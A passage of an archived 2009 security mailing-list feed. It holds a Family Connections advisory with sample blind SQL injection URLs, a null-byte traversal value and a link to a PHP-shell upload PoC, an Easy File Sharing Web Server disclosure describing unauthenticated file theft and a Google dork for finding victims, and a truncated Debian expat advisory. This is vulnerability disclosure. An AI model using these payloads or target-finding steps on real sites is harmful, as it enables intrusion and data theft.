&lt;br&gt;Key  features  are:  a message  board,  a  photo  gallery,
&lt;br&gt;a   blog-like   &amp;quot;Family News&amp;quot;   section,  a  calendar,  an
&lt;br&gt;address book and recipe sharing section.
&lt;br&gt;Each family  member has their own  personal settings, like
&lt;br&gt;the ability to change the website's theme.
&lt;br&gt;Now with Portuguese, Czech, English, Estonian, German, and
&lt;br&gt;Spanish language Support....
&lt;br&gt;&lt;br&gt;&lt;br&gt;II. DESCRIPTION
&lt;br&gt;&lt;br&gt;Many fields are not properly sanitised and some checks can
&lt;br&gt;be bypassed.
&lt;br&gt;&lt;br&gt;&lt;br&gt;III. ANALYSIS
&lt;br&gt;&lt;br&gt;Summary:
&lt;br&gt;&lt;br&gt; A) Multiple Blind SQL Injection
&lt;br&gt; B) Multiple Arbitrary File Upload
&lt;br&gt; C) Local File Inclusion
&lt;br&gt;&lt;br&gt;A) Blind SQL Injection
&lt;br&gt;&lt;br&gt;All  field  that  I  tested  are  vulnerable  to Blind SQL
&lt;br&gt;Injection.
&lt;br&gt;I can't report all vulnerable files because they are many.
&lt;br&gt;The most injections don't require  that  Magic Quotes GPC
&lt;br&gt;(php.ini) is setted to Off.
&lt;br&gt;However an attacker may try to exploit this vulnerability
&lt;br&gt;using the full path disclosure released by the MySQL error
&lt;br&gt;to  write a  file  into the  remote file system,  using as
&lt;br&gt;destination  path  the  gallery  directories,  where   the
&lt;br&gt;permissions must be setted to 777.
&lt;br&gt;&lt;br&gt;&lt;br&gt;B) Multiple Arbitrary File Upload
&lt;br&gt;&lt;br&gt;When we want to write a module to upload a  file,  we must
&lt;br&gt;check  the file  extension  without using the Content-Type
&lt;br&gt;HTTP field,  because  this last  one can be  changed. This
&lt;br&gt;CMS uses the Content-Type to validate the extension.
&lt;br&gt;&lt;br&gt;&lt;br&gt;C) Local File Inclusion
&lt;br&gt;&lt;br&gt;In settings.php an user can set the favorite theme to use.
&lt;br&gt;This theme is included using the include_once PHP function.
&lt;br&gt;The  original  path  is  themes/  but using  the directory
&lt;br&gt;traversal sequence, an user can include arbitrary files.
&lt;br&gt;There  is a  limit of characters  to use, infact the theme
&lt;br&gt;field into the database has a length limit equal to 25.
&lt;br&gt;&lt;br&gt;&lt;br&gt;IV. SAMPLE CODE
&lt;br&gt;&lt;br&gt;A) Multiple Blind SQL Injection
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://site/path/profile.php?member=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://site/path/profile.php?member=1&lt;/a&gt;&amp;nbsp;AND IF(ASCII((SELECT CHAR(90)))
&lt;br&gt;= 90, BENCHMARK(10000000, MD5(0x90)), NULL)
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://site/path/messageboard.php?thread=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://site/path/messageboard.php?thread=1&lt;/a&gt;&amp;nbsp;AND 1=1
&lt;br&gt;&lt;a href=&quot;http://site/path/messageboard.php?thread=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://site/path/messageboard.php?thread=1&lt;/a&gt;&amp;nbsp;AND 1=0
&lt;br&gt;&lt;br&gt;B) Multiple Arbitrary File Upload
&lt;br&gt;&lt;br&gt;A PoC that upload a PHP shell can be downloaded here:
&lt;br&gt;&lt;a href=&quot;http://www.salvatorefresta.net/files/poc/PoC-FC213.c&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.salvatorefresta.net/files/poc/PoC-FC213.c&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;C) Local File Inclusion
&lt;br&gt;&lt;br&gt;Edit  the POST  packet and  send the modified  theme value
&lt;br&gt;like the following: ../ReadMe.txt\0
&lt;br&gt;&lt;br&gt;&lt;br&gt;V. FIX
&lt;br&gt;&lt;br&gt;No Fix.
&lt;br&gt;&lt;br&gt;&lt;br&gt;VIII. DISCLOSURE TIMELINE
&lt;br&gt;&lt;br&gt;2009-12-16 Bug discovered
&lt;br&gt;2009-12-16 Initial vendor contact
&lt;br&gt;2009-12-16 Advisory Release
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Family-Connections-%3C%3D-2.1.3-Multiple-Remote-Vulnerabilities-tp26814101p26814101.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26814290</id>
	<title>FW: [Full-disclosure] File Access Vulnerability in Easy File Sharing 	Web Server</title>
	<published>2009-12-15T18:35:38Z</published>
	<updated>2009-12-15T18:35:38Z</updated>
	<author>
		<name>Thor (Hammer of God)</name>
	</author>
	<content type="html">&lt;br&gt;I actually DID try to access the .sdb in Ubuntu but that was before I identified the file format of the db as myDB as noted.  I do not know of a 'nix based tool for access to the db.  If you just want to verify, you can open the .sdb with a text/hex editor and parse out a filename for yourself - it's pretty straight forward.  If you want to script the download of all files on a vulnerable server (for testing, of course) then you'll probably need to go ahead and set up a VM.
&lt;br&gt;&lt;br&gt;t
&lt;br&gt;&lt;br&gt;From: Rohit Patnaik [mailto:&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26814290&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;quanticle@...&lt;/a&gt;] 
&lt;br&gt;Sent: Tuesday, December 15, 2009 6:29 PM
&lt;br&gt;To: Thor (Hammer of God)
&lt;br&gt;Cc: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26814290&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;bugtraq@...&lt;/a&gt;; &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26814290&amp;i=2&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;full-disclosure@...&lt;/a&gt;
&lt;br&gt;Subject: Re: [Full-disclosure] File Access Vulnerability in Easy File Sharing Web Server
&lt;br&gt;&lt;br&gt;Wow.  Very nice find.  One question: all the cited tools are Windows executables.  Has there been any attempt to run the database viewer in Linux via Wine?  I'm wondering if I'm going to have to set up a VM to try to confirm this, or if I can try to do this via Wine.
&lt;br&gt;&lt;br&gt;Although the n3td3v drama is entertaining, its finds like this which keep me subscribed to this list.  
&lt;br&gt;&lt;br&gt;Thanks again,
&lt;br&gt;Rohit Patnaik
&lt;br&gt;On Tue, Dec 15, 2009 at 6:16 PM, Thor (Hammer of God) &amp;lt;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26814290&amp;i=3&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;thor@...&lt;/a&gt;&amp;gt; wrote:
&lt;br&gt;File Access Vulnerability in Easy File Sharing Web Server
&lt;br&gt;&lt;br&gt;Discovered by:
&lt;br&gt;Timothy &amp;quot;Thor&amp;quot; Mullen
&lt;br&gt;&lt;br&gt;&lt;br&gt;Testing by Steve &amp;quot;Raging Haggis&amp;quot; Moffat, Hammer of God, Bermuda Labs
&lt;br&gt;&lt;br&gt;Product:        Easy File Sharing Web Server, current versions, default installation
&lt;br&gt;Vendor:         &lt;a href=&quot;http://www.sharing-file.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.sharing-file.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Vendor Notification and Disclosure:
&lt;br&gt;08/22/09: EFSW support notified of issue.
&lt;br&gt;08/22/09: EFSW said it is not an issue because you can turn off direct file access.
&lt;br&gt;08/23/09: EFSW support notified that FILES.SDB file can be directly accessed.
&lt;br&gt;08/24/09: EFSW replied, saying 'no, you can't access the file,' even though you can.
&lt;br&gt;12/15/09: Hammer of God released full details after waiting 4 months for vendor to fix.
&lt;br&gt;&lt;br&gt;About:
&lt;br&gt;Easy File Sharing Web Server is an extremely popular web-based file sharing application that has been in use for years.
&lt;br&gt;It is a fast, easy to use commercial, standalone &amp;quot;all-in-one&amp;quot; file-sharing web server.
&lt;br&gt;&lt;br&gt;Customers use a built-in interface to point to files they wish to publish via a menu-driven web application (typically full drives or directories).  Files can be shared anonymously, or via EFSWS's built-in user management.   EFSWS has built-in SSL encryption to prevent logons from being sent in the clear (as well as all other access).    Users log in, and are presented with a menu of files that have been published and that are made available for download.
&lt;br&gt;&lt;br&gt;EFSWS uses the MGH Software &amp;quot;myDB&amp;quot; database plug-in to store db information such as file location, user information (password in the clear), files, forum information, etc.   A free db parser is available at:
&lt;br&gt;&lt;a href=&quot;http://www.mghsoft.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.mghsoft.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Please see vendor site and db engine site for more details.
&lt;br&gt;&lt;br&gt;Vulnerability details:
&lt;br&gt;By default, EFSWS allows a user to download a file directly via a URL if the file name is known.  For example, if the file name posted is MyFileName1234.exe, then one could go directly to:
&lt;br&gt;&lt;a href=&quot;https://www.SiteRunningEFSWS.com/MyFileName1234.exe&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;https://www.SiteRunningEFSWS.com/MyFileName1234.exe&lt;/a&gt;&amp;nbsp;and immediately begin downloading the file.
&lt;br&gt;&lt;br&gt;In itself, this is not a big issue as one would have to guess any given filename.  However, EFSWS always uses the common file name &amp;quot;FILES.SDB&amp;quot; to store all the files being published.  This file is stored in the root program directory.  While the EFSWS product engine filters out many file types, it does NOT filter out FILES.SDB.  If you know someone is running EFSWS, one simply has to access the following URL to anonymously download the FILES.SDB file without authentication:
&lt;br&gt;&lt;a href=&quot;https://www.SiteRunningEFSWS.com/files.sdb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;https://www.SiteRunningEFSWS.com/files.sdb&lt;/a&gt;&lt;br&gt;&lt;br&gt;This will download the FILES.SDB file and will allow an attacker to see every published file via the free viewer record by record. (You can of course view the db as a text file).  Entries look like this:
&lt;br&gt;&lt;br&gt;&amp;quot;V:\rootDirForFiles\applications\Acronis Disk Director Suite 10.2160\ioware-w32-x86-30.exe&amp;quot;
&lt;br&gt;&amp;quot;D:\anotherdir\music\crystalmethod\boom.mp3&amp;quot;
&lt;br&gt;&lt;br&gt;One can now access files directly by removing the drive letter and top directory as follows:
&lt;br&gt;&lt;a href=&quot;https://www.SiteRunningEFSWS.com/music/crystalmethod/boom.mp3&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;https://www.SiteRunningEFSWS.com/music/crystalmethod/boom.mp3&lt;/a&gt;&lt;br&gt;&lt;br&gt;With the ease of database access to filenames, it is trivial to script up a client app to download all published files on the server without authentication over SSL.
&lt;br&gt;&lt;br&gt;Further, it is trivial to determine if someone is running EFSWS, even on an alternate port, by using the following Googledork:  inurl:vfolder.ghp.  There are other more accurate Googledorks, but I'll leave that up to the researcher.
&lt;br&gt;&lt;br&gt;This will show the (typically) unique file &amp;quot;vfolder.gph&amp;quot; results, where you can retrieve the full company URL from, including portnumber.  This too can be scripted.
&lt;br&gt;&lt;br&gt;I am still trying different methods to access the USERS.SDB file, also in the root application directory, which contains all users (even administrative) and passwords (in the clear) in an effort to bypass any mandatory authentication applied, but have not found a way to gain access to this file externally yet.
&lt;br&gt;&lt;br&gt;Vulnerable Versions:
&lt;br&gt;The current version is 5.0, released in August of this year.  While certain vulnerability testing took place in our Hammer of God labs in Bermuda, we were not able to check all versions of the software.  Self-assessment is trivial, so we will leave it up to user to perform his/her own testing.
&lt;br&gt;&lt;br&gt;&lt;br&gt;Summary:
&lt;br&gt;Many companies use EFSWS to &amp;quot;securely&amp;quot; publish files for access to employees, vendors, and customers via SSL controlled by credential logon.  By default, files published may be accesses anonymously if the full file name is used.  Full filename details can be anonymously downloaded by accessing the FILES.SDB file, thus immediately allowing anonymous access to any file an attacker wants.  Note that other system files (such as logs) can also be accessed.  A googledork allows for searching against systems running EFSWS, thus providing a fully scriptable attack against all servers running this product for an anonymous attacker to download all files from all servers over SSL.
&lt;br&gt;&lt;br&gt;Work-arounds:
&lt;br&gt;Ensure that all file access requires logon.  Use ISA/TMG to filter requests for /files.sdb.
&lt;br&gt;&lt;br&gt;Get hammered at HammerofGod.com
&lt;br&gt;&lt;br&gt;&lt;br&gt;--------------------
&lt;br&gt;Timothy Thor Mullen
&lt;br&gt;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26814290&amp;i=4&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;thor@...&lt;/a&gt;
&lt;br&gt;www.hammerofgod.com
&lt;br&gt;&lt;br&gt;_______________________________________________
&lt;br&gt;Full-Disclosure - We believe in it.
&lt;br&gt;Charter: &lt;a href=&quot;http://lists.grok.org.uk/full-disclosure-charter.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://lists.grok.org.uk/full-disclosure-charter.html&lt;/a&gt;&lt;br&gt;Hosted and sponsored by Secunia - &lt;a href=&quot;http://secunia.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/FW%3A--Full-disclosure--File-Access-Vulnerability-in-Easy-File-Sharing-%09Web-Server-tp26814290p26814290.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26813904</id>
	<title>File Access Vulnerability in Easy File Sharing Web Server</title>
	<published>2009-12-15T16:16:51Z</published>
	<updated>2009-12-15T16:16:51Z</updated>
	<author>
		<name>Thor (Hammer of God)</name>
	</author>
	<content type="html">File Access Vulnerability in Easy File Sharing Web Server
&lt;br&gt;&lt;br&gt;Discovered by:
&lt;br&gt;Timothy &amp;quot;Thor&amp;quot; Mullen
&lt;br&gt;&lt;br&gt;&lt;br&gt;Testing by Steve &amp;quot;Raging Haggis&amp;quot; Moffat, Hammer of God, Bermuda Labs
&lt;br&gt;&lt;br&gt;Product: 	Easy File Sharing Web Server, current versions, default installation
&lt;br&gt;Vendor:		&lt;a href=&quot;http://www.sharing-file.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.sharing-file.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Vendor Notification and Disclosure:
&lt;br&gt;08/22/09: EFSW support notified of issue.
&lt;br&gt;08/22/09: EFSW said it is not an issue because you can turn off direct file access.
&lt;br&gt;08/23/09: EFSW support notified that FILES.SDB file can be directly accessed.
&lt;br&gt;08/24/09: EFSW replied, saying 'no, you can't access the file,' even though you can.
&lt;br&gt;12/15/09: Hammer of God released full details after waiting 4 months for vendor to fix.
&lt;br&gt;&lt;br&gt;About:
&lt;br&gt;Easy File Sharing Web Server is an extremely popular web-based file sharing application that has been in use for years. &amp;nbsp;
&lt;br&gt;It is a fast, easy to use commercial, standalone &amp;quot;all-in-one&amp;quot; file-sharing web server. &amp;nbsp;
&lt;br&gt;&lt;br&gt;Customers use a built-in interface to point to files they wish to publish via a menu-driven web application (typically full drives or directories). &amp;nbsp;Files can be shared anonymously, or via EFSWS's built-in user management. &amp;nbsp; EFSWS has built-in SSL encryption to prevent logons from being sent in the clear (as well as all other access). &amp;nbsp; &amp;nbsp;Users log in, and are presented with a menu of files that have been published and that are made available for download. &amp;nbsp; 
&lt;br&gt;&lt;br&gt;EFSWS uses the MGH Software &amp;quot;myDB&amp;quot; database plug-in to store db information such as file location, user information (password in the clear), files, forum information, etc. &amp;nbsp; A free db parser is available at:
&lt;br&gt;&lt;a href=&quot;http://www.mghsoft.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.mghsoft.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Please see vendor site and db engine site for more details.
&lt;br&gt;&lt;br&gt;Vulnerability details:
&lt;br&gt;By default, EFSWS allows a user to download a file directly via a URL if the file name is known. &amp;nbsp;For example, if the file name posted is MyFileName1234.exe, then one could go directly to:
&lt;br&gt;&lt;a href=&quot;https://www.SiteRunningEFSWS.com/MyFileName1234.exe&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;https://www.SiteRunningEFSWS.com/MyFileName1234.exe&lt;/a&gt;&amp;nbsp;and immediately begin downloading the file. 
&lt;br&gt;&lt;br&gt;In itself, this is not a big issue as one would have to guess any given filename. &amp;nbsp;However, EFSWS always uses the common file name &amp;quot;FILES.SDB&amp;quot; to store all the files being published. &amp;nbsp;This file is stored in the root program directory. &amp;nbsp;While the EFSWS product engine filters out many file types, it does NOT filter out FILES.SDB. &amp;nbsp;If you know someone is running EFSWS, one simply has to access the following URL to anonymously download the FILES.SDB file without authentication:
&lt;br&gt;&lt;a href=&quot;https://www.SiteRunningEFSWS.com/files.sdb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;https://www.SiteRunningEFSWS.com/files.sdb&lt;/a&gt;&lt;br&gt;&lt;br&gt;This will download the FILES.SDB file and will allow an attacker to see every published file via the free viewer record by record. (You can of course view the db as a text file). &amp;nbsp;Entries look like this:
&lt;br&gt;&lt;br&gt;&amp;quot;V:\rootDirForFiles\applications\Acronis Disk Director Suite 10.2160\ioware-w32-x86-30.exe&amp;quot;
&lt;br&gt;&amp;quot;D:\anotherdir\music\crystalmethod\boom.mp3&amp;quot;
&lt;br&gt;&lt;br&gt;One can now access files directly by removing the drive letter and top directory as follows:
&lt;br&gt;&lt;a href=&quot;https://www.SiteRunningEFSWS.com/music/crystalmethod/boom.mp3&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;https://www.SiteRunningEFSWS.com/music/crystalmethod/boom.mp3&lt;/a&gt;&lt;br&gt;&lt;br&gt;With the ease of database access to filenames, it is trivial to script up a client app to download all published files on the server without authentication over SSL.
&lt;br&gt;&lt;br&gt;Further, it is trivial to determine if someone is running EFSWS, even on an alternate port, by using the following Googledork: &amp;nbsp;inurl:vfolder.ghp. &amp;nbsp;There are other more accurate Googledorks, but I'll leave that up to the researcher.
&lt;br&gt;&lt;br&gt;This will show the (typically) unique file &amp;quot;vfolder.gph&amp;quot; results, where you can retrieve the full company URL from, including portnumber. &amp;nbsp;This too can be scripted. &amp;nbsp;
&lt;br&gt;&lt;br&gt;I am still trying different methods to access the USERS.SDB file, also in the root application directory, which contains all users (even administrative) and passwords (in the clear) in an effort to bypass any mandatory authentication applied, but have not found a way to gain access to this file externally yet.
&lt;br&gt;&lt;br&gt;Vulnerable Versions:
&lt;br&gt;The current version is 5.0, released in August of this year. &amp;nbsp;While certain vulnerability testing took place in our Hammer of God labs in Bermuda, we were not able to check all versions of the software. &amp;nbsp;Self-assessment is trivial, so we will leave it up to user to perform his/her own testing. 
&lt;br&gt;&lt;br&gt;&lt;br&gt;Summary:
&lt;br&gt;Many companies use EFSWS to &amp;quot;securely&amp;quot; publish files for access to employees, vendors, and customers via SSL controlled by credential logon. &amp;nbsp;By default, files published may be accesses anonymously if the full file name is used. &amp;nbsp;Full filename details can be anonymously downloaded by accessing the FILES.SDB file, thus immediately allowing anonymous access to any file an attacker wants. &amp;nbsp;Note that other system files (such as logs) can also be accessed. &amp;nbsp;A googledork allows for searching against systems running EFSWS, thus providing a fully scriptable attack against all servers running this product for an anonymous attacker to download all files from all servers over SSL. 
&lt;br&gt;&lt;br&gt;Work-arounds:
&lt;br&gt;Ensure that all file access requires logon. &amp;nbsp;Use ISA/TMG to filter requests for /files.sdb. &amp;nbsp;
&lt;br&gt;&lt;br&gt;Get hammered at HammerofGod.com
&lt;br&gt;&lt;br&gt;&lt;br&gt;--------------------
&lt;br&gt;Timothy Thor Mullen
&lt;br&gt;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26813904&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;thor@...&lt;/a&gt;
&lt;br&gt;www.hammerofgod.com
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/File-Access-Vulnerability-in-Easy-File-Sharing-Web-Server-tp26813904p26813904.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26812816</id>
	<title>[SECURITY] [DSA-1953-1] New expat packages fix denial of service</title>
	<published>2009-12-15T12:23:03Z</published>
	<updated>2009-12-15T12:23:03Z</updated>
	<author>
		<name>Stefan Fritsch-2</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;- ------------------------------------------------------------------------
&lt;br&gt;Debian Security Advisory DSA-1953-1 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26812816&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security@...&lt;/a&gt;
&lt;br&gt;&lt;a href=&quot;http://www.debian.org/security/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.debian.org/security/&lt;/a&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Stefan Fritsch
&lt;br&gt;December 15, 2009 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.debian.org/security/faq&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.debian.org/security/faq&lt;/a&gt;&lt;br&gt;- ------------------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Package &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;: expat
&lt;br&gt;Vulnerability &amp;nbsp;: denial of service
&lt;br&gt;Problem type &amp;nbsp; : remote
&lt;br&gt;Debian-specific: no
&lt;br&gt;CVE Id &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; : CVE-2009-3560
&lt;br&gt;Debian Bug &amp;nbsp; &amp;nbsp; : 560901
&lt;br&gt;&lt;br&gt;Jan Lieskovsky discovered an error in expat, an XML parsing C library,
&lt;br&gt;when parsing certain UTF-8 sequences, which can be exploited to crash an
&lt;br&gt;application using the library.
&lt;br&gt;&lt;br&gt;For the old stable distribution (etch), this problem has been fixed in
&lt;br&gt;version 1.95.8-3.4+etch2.
&lt;br&gt;&lt;br&gt;For the stable distribution (lenny), this problem has been fixed in
&lt;br&gt;version 2.0.1-4+lenny2.
&lt;br&gt;&lt;br&gt;For the testing distribution (squeeze) and the unstable distribution
&lt;br&gt;(sid), this problem will be in version 2.0.1-6.
&lt;br&gt;&lt;br&gt;&lt;br&gt;The builds for the mipsel architecture for the old stable distribution
&lt;br&gt;are not included yet. They will be released when they become available.
&lt;br&gt;&lt;br&gt;We recommend that you upgrade your expat packages.
&lt;br&gt;&lt;br&gt;Upgrade instructions
&lt;br&gt;- --------------------
&lt;br&gt;&lt;br&gt;wget url
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will fetch the file for you
&lt;br&gt;dpkg -i file.deb
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will install the referenced file.
&lt;br&gt;&lt;br&gt;If you are using the apt-get package manager, use the line for
&lt;br&gt;sources.list as given below:
&lt;br&gt;&lt;br&gt;apt-get update
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will update the internal database
&lt;br&gt;apt-get upgrade
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will install corrected packages
&lt;br&gt;&lt;br&gt;You may use an automated update by adding the resources from the
&lt;br&gt;footer to the proper configuration.
&lt;br&gt;&lt;br&gt;&lt;br&gt;Debian GNU/Linux 4.0 alias etch (oldstable)
&lt;br&gt;- -------------------------------------------
&lt;br&gt;&lt;br&gt;Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, powerpc, s390 and sparc.
&lt;br&gt;&lt;br&gt;Source archives:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2.diff.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2.diff.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 413321 e6d99f30014fccc0ffb9db1554ba1472
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8.orig.tar.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8.orig.tar.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 318349 aff487543845a82fe262e6e2922b4c8e
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2.dsc&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2.dsc&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp; &amp;nbsp;703 50e1e2ab47fe419e89ef671991ddb3f0
&lt;br&gt;&lt;br&gt;alpha architecture (DEC Alpha)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;69460 59616e932bcd8c86ecd4998fe633f5ee
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_alpha.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_alpha.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;61198 39a8aaec6ba02d5a206e44db95bc5d87
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 143250 ac848be2b40296fbdf3a6a6eeed551f4
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;22360 e3b52bc716fa975c4cc43cc9a00a4546
&lt;br&gt;&lt;br&gt;amd64 architecture (AMD x86_64 (AMD64))
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;64628 0ebf8bb1e3b55cf8e751f638881eee14
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;21518 4ee3b94bccadb231c5ee8e47b9ebe053
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_amd64.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_amd64.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;56436 e856562cc8156f88ef07d3b79aac9336
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 133908 30ba0c9b11641b960327577a65ff4423
